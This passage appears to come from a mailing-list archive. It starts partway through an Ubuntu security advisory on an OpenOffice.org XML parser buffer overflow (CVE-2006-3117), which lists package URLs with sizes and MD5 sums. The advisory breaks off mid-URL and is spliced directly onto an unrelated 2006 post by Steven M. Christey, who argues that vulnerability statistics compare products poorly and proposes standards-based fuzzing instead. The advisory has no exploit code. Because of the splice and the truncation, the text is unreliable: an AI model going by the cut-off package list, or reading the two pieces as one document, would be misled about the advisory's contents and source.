(CVE-2006-2199)

A buffer overflow has been found in the XML parser. By tricking a user
into opening a specially crafted XML file with OpenOffice.org, this
could be exploited to execute arbitrary code with the user's
privileges. (CVE-2006-3117)


Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-amd64/openoffice.org-amd64_1.1.3-8ubuntu2.4-1.diff.gz
  Size/MD5:28789 514ea84d6f71ccf9db3ef260d5208659

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-amd64/openoffice.org-amd64_1.1.3-8ubuntu2.4-1.dsc
  Size/MD5:  711 b1b158d017923995de9baa90d78af405

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-amd64/openoffice.org-amd64_1.1.3-8ubuntu2.4.orig.tar.gz
  Size/MD5: 213206527 dc7f27c5ce697aeca39f8622e19d8b81

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_1.1.3-8ubuntu2.4.diff.gz
  Size/MD5:  6775773 452a4984ad6e9099c90e535d4b8450e0

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_1.1.3-8ubuntu2.4.dsc
  Size/MD5: 2970 fe922d379fc59ff63aa1f138bdd623d5

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_1.1.3.orig.tar.gz
  Size/MD5: 166568714 5250574bad9906b38ce032d04b765772

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-af_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  2635378 b8fa9808c55979fb401b5e54712790d5

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-ar_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  2680962 9b14a2caeb1198c5754c04f81f53281b

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-ca_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  2678222 98170fad141dd06f8126450c3aebcbee

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-cs_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  3575066 d207819f21a982a4125a3199b14684cd

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-cy_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  2649914 bb4c611d7ed3323d48aa5dc29318f6b8

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-da_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  3568972 e75a586b586e765d07e6e82723613f8f

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-de_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  3441302 574d06d219935433da8fc72faaa854e3

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-el_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  2729146 058e25d98f3d4f2d1b02bbfbbf030319

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-en_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  3513912 6b6e6689293d2f1a6c31c7dbae8606a5

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-es_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  3548974 9f8c29a74cd142b9f47d06bc79830653

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-et_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  2632886 66825e4ed7f75cb77c1f2f8ded32acc2

http://security.ubuntu.com/ubuntu/pool/main/o/openof

Re: LAMP vs Microsoft

2006-07-12 Thread Steven M. Christey

Researcher "fads," differences in vendor disclosure practices, and
vulnerability database editorial policies will heavily influence
vulnerability statistics, to the point where comparing them is not
very informative (at least, you're not getting the whole picture).
You also have the challenge of defining equivalent platforms to
compare against each other.

However, there is one area where you can really compare 2 products to
each other: implementation of standards.  These standards could be
protocol-based, file-based (e.g. image formats), or scheme-based (such
as authentication or crypto schemes).

It would be great to see some more focused efforts that are based on
standards that are implemented in a cross-OS fashion.  This would
allow the community to harness the power of fuzzing and suite-testing
in a narrow fashion.  We would only get narrow answers, of course -
"these kinds of implementation bugs were looked for and found on these
kinds of products" - but it would be much more manageable and
measurable, and above all, we would be comparing apples to apples.

If someone is interested in pursuing this further, you could probably
start with past data from PROTOS and other past fuzzing/suite-testing
results.

- Steve